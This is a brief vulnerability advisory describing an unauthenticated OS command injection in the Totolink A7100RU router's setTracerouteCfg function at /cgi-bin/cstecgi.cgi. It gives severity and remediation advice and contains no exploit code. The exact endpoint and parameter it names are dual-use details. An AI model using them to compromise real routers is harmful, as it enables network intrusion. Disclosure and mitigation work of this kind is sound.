A critical OS command injection vulnerability in the Acer Totolink A7100RU allows remote, unauthenticated attackers to execute arbitrary commands on the system.

The setTracerouteCfg function in /cgi-bin/cstecgi.cgi lacks proper input validation on the command argument, enabling an unauthenticated attacker to perform OS command injection.

With a CVSS score of 9.8, this vulnerability allows for complete device control. This could lead to unauthorized access to the local area network, interception of sensitive data, and potential use of the device in larger-scale attacks.

Immediate Action: Install the latest firmware update provided by Acer/Totolink to resolve this command injection vulnerability.

Proactive Monitoring: Monitor for unusual traceroute or diagnostic requests and unexpected system command execution.

Compensating Controls: Restrict access to the router's web-based management interface to authorized administrative workstations.

Public Exploit Available: True

Immediate remediation is essential. Administrators must update the device firmware and limit exposure of the management interface to mitigate the risk of remote command execution.